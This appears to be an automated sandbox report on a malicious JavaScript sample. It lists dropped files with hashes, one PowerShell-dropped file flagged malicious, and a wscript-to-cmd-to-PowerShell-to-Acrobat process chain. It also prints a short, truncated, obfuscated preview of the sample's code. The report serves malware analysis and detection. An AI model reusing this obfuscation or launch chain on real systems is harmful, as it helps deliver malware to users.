Size (bytes): | 284 |
Entropy (8bit): | 5.289540290315025 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX44CjIywGnZiQ0Y8fKoAvJf+dPeUkwRe9:YvXKXzBSc9BG28Ukee9 |
MD5: | A526DA57877559FAF12D8409B2E3137E |
SHA1: | EC27E67525537D2B73D9AFE26900B2B4C5E35EBD |
SHA-256: | E9D0D7971FD4F373F9A067EE7692624F1047A6511824D95E9408A183E4EC1556 |
SHA-512: | E220E4AF58EFEE6D5DD63EBABF725436695012B4810E6C3C630C25834240A7BA9FE5B7A0CE57E56BF511654DFF78E60425D67E4543449355AE01905733DDFD4D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.286661266554692 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX44CjIywGnZiQ0Y8fKoAvJfbPtdPeUkwRe9:YvXKXzBSc9BGDV8Ukee9 |
MD5: | 7D92772A467FD961BDA18F79E565CD42 |
SHA1: | 87875135F77965E7EB15F83F05922536F50C8E7E |
SHA-256: | 34FBA321DB43111A6C87C65444D3EF6DAFC19270D87F65FAB4CE28FFD0C372BA |
SHA-512: | 8C6E85D2C64A14DFF4138D988C356CACB4BA6C99C5155006F2C922A30789E27C4D6DAE5567F08ED88A9E57578CE81C908E2CB6B91CFB2332B722EF6B50506FA5 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.2897716093077785 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX44CjIywGnZiQ0Y8fKoAvJf21rPeUkwRe9:YvXKXzBSc9BG+16Ukee9 |
MD5: | EE8AEB29AA75EF9E0729B17394F6C209 |
SHA1: | F10086047CED8C99A783CD9C731DE76A6C0872F6 |
SHA-256: | 50C7454AC36D7E750AD116DF7F912A0E1201D240DF37E9AB310F4EB043A266E2 |
SHA-512: | 9C62A9C328EF62D25DA277554C3789BA65BDEC57BF23CB39EA46EAE615CD22B5D34F41668F04AFFEA7E5BC28A7DDF1625321D4F8A86F258D04EEA15D90D4A03B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.664371251409096 |
Encrypted: | false |
SSDEEP: | 24:Yv6XzBH96amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSx:Yv2v0BgkDMUJUAh8cvMx |
MD5: | 6F1D173A6AB8DCAA39FEF2FE2A7797A7 |
SHA1: | 6FF025E5B681FD084F079E4A3897D6F335536E8B |
SHA-256: | F68CF2A78635094AEB36BFD964DD03871CCD75A04B61296EE246A3D08D40F017 |
SHA-512: | 8AA7D93DC8A73AD25E1B76B74B6783A99CEC9E484E273D68B5E3A5C30B169AE71ECD2854F0FA32751994FBCD801F653DC22874A56668E057309EA8BF8782D881 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.267008508683345 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX44CjIywGnZiQ0Y8fKoAvJfshHHrPeUkwRe9:YvXKXzBSc9BGUUUkee9 |
MD5: | 9217B8FADDD219895C00ABFE0C153F60 |
SHA1: | 9A443AA0E6789D646701F686B84E6AFF268CCEBC |
SHA-256: | 1867AE949C810E37B4041E9E7A7C40CF9C36979585EB61C60AC5C06C9A9174DE |
SHA-512: | BC5A92069CC24197E1B15FDD1103102139FD38213AA8CE23B8C99856BBD1C9DA81C57574A6D7EEBBF593CF2E946D447909C079DF0590558CCD07C12B39E756F3 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.276927515356359 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX44CjIywGnZiQ0Y8fKoAvJTqgFCrPeUkwRe9:YvXKXzBSc9BGTq16Ukee9 |
MD5: | 8563460CC1F6F98470849D92DAAF55C4 |
SHA1: | 09B879EE4B498AC0D3A63298254862905AC23EF6 |
SHA-256: | 2E1053AAB397CFF06230A65CDDAABEFAA97221347D794C5FC4828E5B2AF86702 |
SHA-512: | 92B4C00DAD229DA30F7264C14B59EFD4374B8714A08AFBD56837EF7AB48F9D69148A4508880613494D90F3529121B515099A83A79379A28090F949404288070D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.149855273252279 |
Encrypted: | false |
SSDEEP: | 24:Y8CaeEWayGxIb7AlKqVRpEgIyjtj0S6Vnyi2dVRrx2LS0CR9stcfJmUKYR5kdN9B:Yo9eMlKqVJPBkx6pW69+cRmUJg9Ae |
MD5: | 5AD8D17FBA1E05BBAE25AE6DA88A5534 |
SHA1: | 21BF2E248E1AC3455C023E69589A363DFD912DF2 |
SHA-256: | CD2AF96B6AD3743007B8973B479D92FC1EFCE07E2EDE082A66B8A177F60DCE7A |
SHA-512: | B557DF2C93944B1F4692A3FCA68203ADFC28A9D8414511FBC4F25F638E558A471AB4F1A39EF73B0DBC21FB428AD1C79DB93C55E997B1733BBCA4ECB7E6E78776 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.1462699045422609 |
Encrypted: | false |
SSDEEP: | 24:TLhx/XYKQvGJF7ursnRZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcH6:TFl2GL7msjXc+XcGNFlRYIX2v3k6 |
MD5: | B7C5E698B8B504F6103C8037FBF923E5 |
SHA1: | 014F5A15DE1F1A11D5FD3399170148F9A4BB23C0 |
SHA-256: | 1338C6F21F27671F37C863D2D53D6B4DDC229B564F95DC6CCAA71F001A3CB5D5 |
SHA-512: | 8B42A7EE7865CEC3559EA7417D397F124D81DD5365AA7B0869C24163A412100EBB464E00A2855CF4DF6AE882D0519528A5DA6F6A60454F4B3106928E237DED73 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.551190003681549 |
Encrypted: | false |
SSDEEP: | 24:7+tXUXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLuxKRqLxx/XYK+:7MkXc+XcGNFlRYIX2v5RqVl2GL7msW |
MD5: | DA47E9264E13F7F9ECA4D32AD06C9F82 |
SHA1: | A7662DF8196553FEBAEC21AD4E5DEA1576CF2C94 |
SHA-256: | AF13A150589A600E6FDF8B085A7CBC471356FFE03F31B1C062C2FA59CD9C38F1 |
SHA-512: | EC6A971817CED6DAA079F164D8318F532C4BD578B5D8E86D782ED9D9BC92F170442B973E7849A50A51AF322FF41D1661DE532B75C5E6ED61A6B24A11F7D65C36 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEg1flQa9FH25h2QuaNaT+xlpchYyu:6a6TZ44ADE1f+a/W5hgGihK |
MD5: | ADC3E74C6C5D58A4D7123463D0AA4DD9 |
SHA1: | 573BA243700FAB7C9CBA47CA77D8A8B5B564308A |
SHA-256: | E2BCD3D0B1229312BA8F13EAA8EB8D614FD8A5FF5CABE15D8BF5CCEB8BF9F593 |
SHA-512: | 45F9FE3845F3CE5B3042C1B68B5E5FF7CA33776E438B79D1B55A169DE1BE07D9C21A8830724DC29BBB4C2E3B256CE86DC6EB295C94793880F554C9B52B79CB8C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulxmH/lZ:NllUg |
MD5: | D904BDD752B6F23D81E93ECA3BD8E0F3 |
SHA1: | 026D8B0D0F79861746760B0431AD46BAD2A01676 |
SHA-256: | B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2 |
SHA-512: | 5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.50000825118868 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClEwwNDaCH:Qw946cPbiOxDlbYnuRK+bD1rH |
MD5: | 4FE61E43D65E8943176AF01FC938138E |
SHA1: | E3C748BAA77E2F157E406B3F56D536F1E024B59E |
SHA-256: | 39A276D84C6C7649D11205384243E3C9F9B44304E92429DA16B717AF30804F70 |
SHA-512: | 535A39D0EF738EC36EDD7F012C3C7A6B9464E095874BCD2B29F5AF1A41946D99F8228916D280C8AD5B2AC7411294D6AEDFC668CD329180DAC6D7D3F96CBE9C4F |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 15-05-36-779.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.338264912747007 |
Encrypted: | false |
SSDEEP: | 384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb |
MD5: | 128A51060103D95314048C2F32A15C66 |
SHA1: | EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB |
SHA-256: | 601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713 |
SHA-512: | 55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.371821229099199 |
Encrypted: | false |
SSDEEP: | 384:SrNKVbIZBwdgj9uzTfwZyYoxFS71Aa6QXcHpDrZUSQ15uoO5puTujcjKLhzwkLjL:4kj |
MD5: | CCC61D11B7E32159252EF465961F9702 |
SHA1: | B6555DF4C337998012D7FE837FE278FBB81C5C6F |
SHA-256: | CC7CE0CB1EAA65A27CEB866697A2C4B537B90FAC5F483132BAEDAF905BE49583 |
SHA-512: | AB50FC00AC488084A4B6CBD42F2CD1B72D5383020631F5081F53F66809C789A15D94A9CE0E844FFC05763F21E5F0A27A033334AA5BE2D347EA9D0E914ADDB49E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.396778046005687 |
Encrypted: | false |
SSDEEP: | 192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcbw8cbiI93cb1:V3fOCIdJDeCd9o |
MD5: | 1BAEEE190FD8D36E3011BE5F3238CEC3 |
SHA1: | E46021C74BB4B4636770BE71311D71059C5B0D23 |
SHA-256: | 5D00CB6B4DD86C28C301AA21E05DCF6494F4E10F4D69EA2286941D298E19C6A7 |
SHA-512: | A3279F807D3A68649C70539756529A3ED25C3E645324F4F3FEAB16203445D465B9BAB900E0236C58A3DC06DD47789901A765A696E7D40277EF7FBF0313BDB254 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:bWNh3P6+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:C3PDegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 59EE5E2FB56A099CAA8EDFD7AF821ED6 |
SHA1: | F5DC4F876768D57B69EC894ADE0A66E813BFED92 |
SHA-256: | E100AAAA4FB2B3D78E3B6475C3B48BE189C5A39F73CFC2D22423F2CE928D3E75 |
SHA-512: | 77A45C89F6019F92576D88AE67B59F9D6D36BA6FDC020419DAB55DBD8492BA97B3DAC18278EB0210F90758B3D643EA8DCF8EC2BD1481930A59B8BB515E7440FE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/M7ouWLaGZjZwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:RuWLaGZjZwZGk3mlind9i4ufFXpAXkru |
MD5: | AE1E8A5D3E7B2198980A0CA16DE5F3D3 |
SHA1: | A1DB2C58AFC81E6A114A8EB47BE0243956F79460 |
SHA-256: | 8C2E1B13F6658714D51737D6745FE065B87497923945AB3028706A4171C8328F |
SHA-512: | 5B36CF0982C5AFED5CCEA4B30A0B31A2B5312FBF5438623D53153E076B59F1B4BEF8C08695EA74E086BCA4EF7221889DB977B5DCFF4C684BA0683FDDECDE2EC4 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:rBgI81ReWQ53+sQ3POSTJJJJEQ6T9UkRm1XX/FLYVbxrr/IxktOQZ1mau4yBwsOo:r+Tegs6lTJJJJv+9UZd1ybxrr/IxkB1m |
MD5: | 774036904FF86EB19FCE18B796528E1E |
SHA1: | 2BA0EBF3FC7BEF9EF5BFAD32070BD3C785904E16 |
SHA-256: | D2FC8EA3DDD3F095F7A469927179B408102471627C91275EDB4D7356F8E453AD |
SHA-512: | 9E9662EA15AE3345166C1E51235CDCE3123B27848E4A4651CC4D2173BDD973E4AD2F8994EFF34A221A9F07AA676F52BEB6D90FF374F6CCB0D06FA39C3EFE6B31 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo |
MD5: | A0CFC77914D9BFBDD8BC1B1154A7B364 |
SHA1: | 54962BFDF3797C95DC2A4C8B29E873743811AD30 |
SHA-256: | 81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685 |
SHA-512: | 74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.911960121965205 |
TrID: | |
File name: | 348426869538810128.js |
File size: | 21'348 bytes |
MD5: | 587f26fe783525965d830516cc6c4a4c |
SHA1: | 68d37f5779aae857ee2bbe94018bedcf09673d23 |
SHA256: | aea5b97c75218cdbd48f44dc29d9f431c459d83649fbc1334d7d65d4314ed337 |
SHA512: | 59389c4bafa4d2a571faedcd4be11d0c3abfdf763b05ae2db308883a17446afab289e3eac7bba8f562bd385d289d74765a9ed85749c048d78e052d88df30922f |
SSDEEP: | 384:BfvCLC3gPMHW2tmk2Qer1Cu47K82R2few:RvqVPMHW2tmk23K7K8p |
TLSH: | F5A2869CEC12DDE257ED04F8A3BE05F043AC52844C7D43CDC4B22AD14527AAD66E92BB |
File Content Preview: | function kizzlu(){zqzynv=[1031,3079,5127,4103,2055,3072];var wjlakoz=this[nzrevndvn+dpcpzoue+mxjtdiq+upnxm+ttwxg+dynoutmti+eidhxooc+fiiqktlb](this[hbyqog+fvumoj+erqwnvwf+mxjtdiq+gkvcn+nzrevndvn+fiiqktlb][kjjuacuq+mxjtdiq+ttwxg+dpcpzoue+fiiqktlb+ttwxg+vzaj |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 1 |
Start time: | 15:05:27 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff66abe0000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 15:05:28 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74ca40000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 15:05:28 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff66e660000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 15:05:28 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6e3d50000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 15:05:32 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff651090000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 15:05:32 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74ca40000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 15:05:32 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff671ca0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 15:05:33 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 15:05:33 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7403e0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 15:05:33 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
